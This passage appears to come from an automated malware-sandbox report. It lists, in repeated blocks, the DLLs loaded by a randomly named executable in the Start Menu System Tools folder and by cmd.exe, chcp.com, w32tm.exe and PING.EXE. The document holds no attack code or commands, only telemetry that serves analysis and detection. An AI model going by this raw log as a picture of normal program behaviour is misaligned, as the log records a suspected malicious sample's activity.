                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
